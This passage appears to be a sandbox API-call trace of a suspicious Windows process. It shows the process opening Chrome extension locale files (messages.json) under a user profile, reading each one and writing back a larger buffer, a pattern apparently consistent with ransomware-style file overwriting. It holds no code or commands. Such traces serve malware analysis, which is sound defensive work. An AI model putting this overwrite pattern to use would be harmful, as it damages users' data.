lpUsedDefaultChar=0x0) returned 32 [0174.239] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="topbar_floating_button_hover.png", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="topbar_floating_button_hover.png", lpUsedDefaultChar=0x0) returned 32 [0174.239] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e94e18, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e94e18*, lpNumberOfBytesRead=0x2fdf2bc*=0xa0, lpOverlapped=0x0) returned 1 [0174.240] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.240] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x628, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x628, lpOverlapped=0x0) returned 1 [0174.240] CloseHandle (hObject=0x1dc) returned 1 [0174.240] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.241] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.241] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2bd [0174.241] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.241] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.241] ReleaseMutex (hMutex=0x168) returned 1 [0174.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.241] ReadFile (in: hFile=0x1dc, lpBuffer=0x25abd28, nNumberOfBytesToRead=0x2bd, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abd28*, lpNumberOfBytesRead=0x2fdf2bc*=0x2bd, lpOverlapped=0x0) returned 1 [0174.245] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.245] WriteFile (in: hFile=0x1dc, lpBuffer=0x287dad8*, nNumberOfBytesToWrite=0x845, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x287dad8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x845, lpOverlapped=0x0) returned 1 [0174.246] CloseHandle (hObject=0x1dc) returned 1 [0174.246] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.247] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.247] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2b4 [0174.247] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.247] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.247] ReleaseMutex (hMutex=0x168) returned 1 [0174.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.247] ReadFile (in: hFile=0x1dc, lpBuffer=0x25abd28, nNumberOfBytesToRead=0x2b4, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abd28*, lpNumberOfBytesRead=0x2fdf2bc*=0x2b4, lpOverlapped=0x0) returned 1 [0174.281] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.281] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x83c, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2fdf2d0*=0x83c, lpOverlapped=0x0) returned 1 [0174.281] CloseHandle (hObject=0x1dc) returned 1 [0174.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.282] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.282] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x29d [0174.282] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.282] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.282] ReleaseMutex (hMutex=0x168) returned 1 [0174.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.282] ReadFile (in: hFile=0x1dc, lpBuffer=0x25abd28, nNumberOfBytesToRead=0x29d, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abd28*, lpNumberOfBytesRead=0x2fdf2bc*=0x29d, lpOverlapped=0x0) returned 1 [0174.284] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.285] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x825, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x2fdf2d0*=0x825, lpOverlapped=0x0) returned 1 [0174.285] CloseHandle (hObject=0x1dc) returned 1 [0174.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.286] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.286] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x29c [0174.286] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.286] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.286] ReleaseMutex (hMutex=0x168) returned 1 [0174.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.286] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.286] ReadFile (in: hFile=0x1dc, lpBuffer=0x25abd28, nNumberOfBytesToRead=0x29c, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abd28*, lpNumberOfBytesRead=0x2fdf2bc*=0x29c, lpOverlapped=0x0) returned 1 [0174.324] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.324] WriteFile (in: hFile=0x1dc, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x824, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x824, lpOverlapped=0x0) returned 1 [0174.329] CloseHandle (hObject=0x1dc) returned 1 [0174.329] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.330] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.330] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x315 [0174.330] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.342] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.342] ReleaseMutex (hMutex=0x168) returned 1 [0174.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.342] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.342] ReadFile (in: hFile=0x1dc, lpBuffer=0x25abd28, nNumberOfBytesToRead=0x315, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25abd28*, lpNumberOfBytesRead=0x2fdf2bc*=0x315, lpOverlapped=0x0) returned 1 [0174.351] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.351] WriteFile (in: hFile=0x1dc, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x89d, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x89d, lpOverlapped=0x0) returned 1 [0174.351] CloseHandle (hObject=0x1dc) returned 1 [0174.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.352] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.352] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x124 [0174.352] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.352] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.352] ReleaseMutex (hMutex=0x168) returned 1 [0174.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.352] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.352] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b68, nNumberOfBytesToRead=0x124, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesRead=0x2fdf2bc*=0x124, lpOverlapped=0x0) returned 1 [0174.353] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.353] WriteFile (in: hFile=0x1dc, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x6ac, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x6ac, lpOverlapped=0x0) returned 1 [0174.354] CloseHandle (hObject=0x1dc) returned 1 [0174.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.354] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.354] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x100 [0174.354] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.354] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.354] ReleaseMutex (hMutex=0x168) returned 1 [0174.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.355] ReadFile (in: hFile=0x1dc, lpBuffer=0x1eea538, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea538*, lpNumberOfBytesRead=0x2fdf2bc*=0x100, lpOverlapped=0x0) returned 1 [0174.355] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.356] WriteFile (in: hFile=0x1dc, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x688, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x688, lpOverlapped=0x0) returned 1 [0174.356] CloseHandle (hObject=0x1dc) returned 1 [0174.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.357] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.357] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x10f [0174.357] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.357] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.357] ReleaseMutex (hMutex=0x168) returned 1 [0174.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.357] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.357] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ef2138, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2138*, lpNumberOfBytesRead=0x2fdf2bc*=0x10f, lpOverlapped=0x0) returned 1 [0174.358] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.358] WriteFile (in: hFile=0x1dc, lpBuffer=0x28469b8*, nNumberOfBytesToWrite=0x697, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x28469b8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x697, lpOverlapped=0x0) returned 1 [0174.358] CloseHandle (hObject=0x1dc) returned 1 [0174.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.407] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.407] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xdf [0174.407] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.407] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0174.407] ReleaseMutex (hMutex=0x168) returned 1 [0174.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0174.408] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0174.408] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4b98, nNumberOfBytesToRead=0xdf, lpNumberOfBytesRead=0x2fdf2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4b98*, lpNumberOfBytesRead=0x2fdf2bc*=0xdf, lpOverlapped=0x0) returned 1 [0174.408] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf300*=0) returned 0x0 [0174.408] WriteFile (in: hFile=0x1dc, lpBuffer=0x284a9e8*, nNumberOfBytesToWrite=0x667, lpNumberOfBytesWritten=0x2fdf2d0, lpOverlapped=0x0 | out: lpBuffer=0x284a9e8*, lpNumberOfBytesWritten=0x2fdf2d0*=0x667, lpOverlapped=0x0) returned 1 [0174.409] CloseHandle (hObject=0x1dc) returned 1 [0174.409] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0174.410] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.410] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0xea [0174.410] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0174.410] WaitForSingleObject (hHandle=0x168, 